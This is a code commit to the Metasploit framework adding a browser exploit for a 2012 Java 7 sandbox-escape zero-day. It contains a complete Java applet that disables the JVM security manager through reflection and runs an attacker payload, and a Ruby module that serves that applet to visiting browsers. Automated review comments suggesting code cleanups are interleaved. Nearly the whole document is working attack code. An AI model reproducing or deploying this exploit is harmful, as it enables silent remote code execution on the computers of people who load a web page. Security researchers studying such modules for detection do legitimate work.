
Added java_jre17_exec

commit 52ca1083c22de7022baf7dca8a1756909f803341 1 parent b0661a3
jvazquez-r7 authored
BIN  data/exploits/CVE-2012-XXXX/Exploit.class
Binary file not shown
75 external/source/exploits/CVE-2012-XXXX/Exploit.java
@@ -0,0 +1,75 @@
+//
+// CVE-2012-XXXX Java 0day
+//
+// reported here: http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html
+
+import java.applet.Applet;
+import java.awt.Graphics;
+import java.beans.Expression;
+import java.beans.Statement;
+import java.lang.reflect.Field;
+import java.net.URL;
+import java.security.*;
+import java.security.cert.Certificate;
+import metasploit.Payload;
+
+public class Exploit extends Applet
+{
+
+ public Exploit()
+ {
+ }
+
+ public void disableSecurity()
+ throws Throwable
+ {
+ Statement localStatement = new Statement(System.class, "setSecurityManager", new Object[1]);
+ Permissions localPermissions = new Permissions();
+ localPermissions.add(new AllPermission());
+ ProtectionDomain localProtectionDomain = new ProtectionDomain(new CodeSource(new URL("file:///"), new Certificate[0]), localPermissions);
+ AccessControlContext localAccessControlContext = new AccessControlContext(new ProtectionDomain[] {
+ localProtectionDomain
+ });
+ SetField(Statement.class, "acc", localStatement, localAccessControlContext);
+ localStatement.execute();
+ }
+
+ private Class GetClass(String paramString)
+ throws Throwable
+ {
+ Object arrayOfObject[] = new Object[1];
+ arrayOfObject[0] = paramString;
+ Expression localExpression = new Expression(Class.class, "forName", arrayOfObject);
+ localExpression.execute();
+ return (Class)localExpression.getValue();
+ }
+
+ private void SetField(Class paramClass, String paramString, Object paramObject1, Object paramObject2)
+ throws Throwable
+ {
+ Object arrayOfObject[] = new Object[2];
+ arrayOfObject[0] = paramClass;
+ arrayOfObject[1] = paramString;
+ Expression localExpression = new Expression(GetClass("sun.awt.SunToolkit"), "getField", arrayOfObject);
+ localExpression.execute();
+ ((Field)localExpression.getValue()).set(paramObject1, paramObject2);
+ }
+
+ public void init()
+ {
+ try
+ {
+ disableSecurity();
+ Payload.main(null);
+ }
+ catch(Throwable localThrowable)
+ {
+ localThrowable.printStackTrace();
+ }
+ }
+
+ public void paint(Graphics paramGraphics)
+ {
+ paramGraphics.drawString("Loading", 50, 25);
+ }
+}
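Review bot: `init()` and `paint()` override `Applet` methods without `@Override`, and `GetClass`/`SetField` break Java's lowerCamelCase method naming and use the raw type `Class` where `Class<?>` would do. The local names (`localStatement`, `arrayOfObject`, `paramObject1`) read like decompiler output and the file has no comments beyond the header link, so a reader has to work out for themselves what `disableSecurity()` does. A one-line comment on that method, such as `// Replaces the Statement's "acc" AccessControlContext with an AllPermission one, then invokes System.setSecurityManager(null)`, would make the sample usable as a reference for analysts writing detections. The header still says `CVE-2012-XXXX`; it should record the assigned identifier and the JRE builds the sample was tested on once those are known.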
118 modules/exploits/multi/browser/java_jre17_exec.rb
@@ -0,0 +1,118 @@
+##
+# This file is part of the Metasploit Framework and may be subject to
+# redistribution and commercial restrictions. Please see the Metasploit
+# web site for more information on licensing and terms of use.
+# http://metasploit.com/
+##
+
+require 'msf/core'
+require 'rex'
+
+class Metasploit3 < Msf::Exploit::Remote
+ Rank = ExcellentRanking
+
+ include Msf::Exploit::Remote::HttpServer::HTML
+
+ include Msf::Exploit::Remote::BrowserAutopwn
+ autopwn_info({ :javascript => false })
+
+ def initialize( info = {} )
+ super( update_info( info,
+ 'Name' => 'Java 7 Applet Remote Code Execution',
+ 'Description' => %q{
+ This module exploits a vulnerability in Java 7, which allows an attacker to run arbitrary
+ Java code outside the sandbox. This flaw is also being exploited in the wild, and there is
+ no patch from Oracle at this point. The exploit has been tested to work against: IE, Chrome
+ and Firefox across different platforms.
+ },
+ 'License' => MSF_LICENSE,
+ 'Author' =>
+ [
+ 'Unknown', # Vulnerability Discovery
+ 'jduck', # metasploit module
+ 'sinn3r', # metasploit module
+ 'juan vazquez', # metasploit module
+ ],
+ 'References' =>
+ [
+ #[ 'CVE', '' ],
+ #[ 'OSVDB', '' ],
+ [ 'URL', 'http://blog.fireeye.com/research/2012/08/zero-day-season-is-not-over-yet.html' ],
+ [ 'URL', 'http://www.deependresearch.org/2012/08/java-7-0-day-vulnerability-information.html' ]
+ ],
+ 'Platform' => [ 'java', 'win', 'linux' ],
+ 'Payload' => { 'Space' => 20480, 'BadChars' => '', 'DisableNops' => true },
+ 'Targets' =>
+ [
+ [ 'Generic (Java Payload)',
+ {
+ 'Arch' => ARCH_JAVA,
+ }
+ ],
+ [ 'Windows Universal',
+ {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'win'
+ }
+ ],
+ [ 'Linux x86',
+ {
+ 'Arch' => ARCH_X86,
+ 'Platform' => 'linux'
+ }
+ ]
+ ],
+ 'DefaultTarget' => 0,
+ 'DisclosureDate' => 'Aug 26 2012'
+ ))
+ end
+
+
+ def on_request_uri( cli, request )
+ if not request.uri.match(/\.jar$/i)
+ if not request.uri.match(/\/$/)
+ send_redirect(cli, get_resource() + '/', '')
+ return
+ end
+
+ print_status("#{self.name} handling request")
+
+ send_response_html( cli, generate_html, { 'Content-Type' => 'text/html' } )
+ return
+ end
+
+ paths = [
+ [ "Exploit.class" ]
+ ]
+
+ p = regenerate_payload(cli)
+
+ jar = p.encoded_jar
+ paths.each do |path|
+ 1.upto(path.length - 1) do |idx|
+ full = path[0,idx].join("/") + "/"
+ if !(jar.entries.map{|e|e.name}.include?(full))
+ jar.add_file(full, '')
+ end
+ end
+ fd = File.open(File.join( Msf::Config.install_root, "data", "exploits", "CVE-2012-XXXX", path ), "rb")
+ data = fd.read(fd.stat.size)
+ jar.add_file(path.join("/"), data)
+ fd.close
+ end
+
+ print_status("Sending Applet.jar")
+ send_response( cli, jar.pack, { 'Content-Type' => "application/octet-stream" } )
+
+ handler( cli )
+ end
+
+ def generate_html
+ html = "<html><head></head>"
+ html += "<body>"
+ html += "<applet archive=\"Exploit.jar\" code=\"Exploit.class\" width=\"1\" height=\"1\">"
+ html += "</applet></body></html>"
+ return html
+ end
+
+end
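Review bot: In `on_request_uri` the class file is opened with `File.open(...)` and closed by a separate `fd.close`, so the handle is leaked if `fd.read` or `jar.add_file` raises. The block form closes it on every path: `data = File.open(File.join(Msf::Config.install_root, "data", "exploits", "CVE-2012-XXXX", path), "rb") { |fd| fd.read }`. The `References` array still has its `CVE` and `OSVDB` entries commented out, and the data directory is named with the `CVE-2012-XXXX` placeholder; both should be filled in once an identifier is assigned, so that defenders can map the module to vendor advisories. The description's "no patch from Oracle at this point" will go stale and would read better with the date it was written.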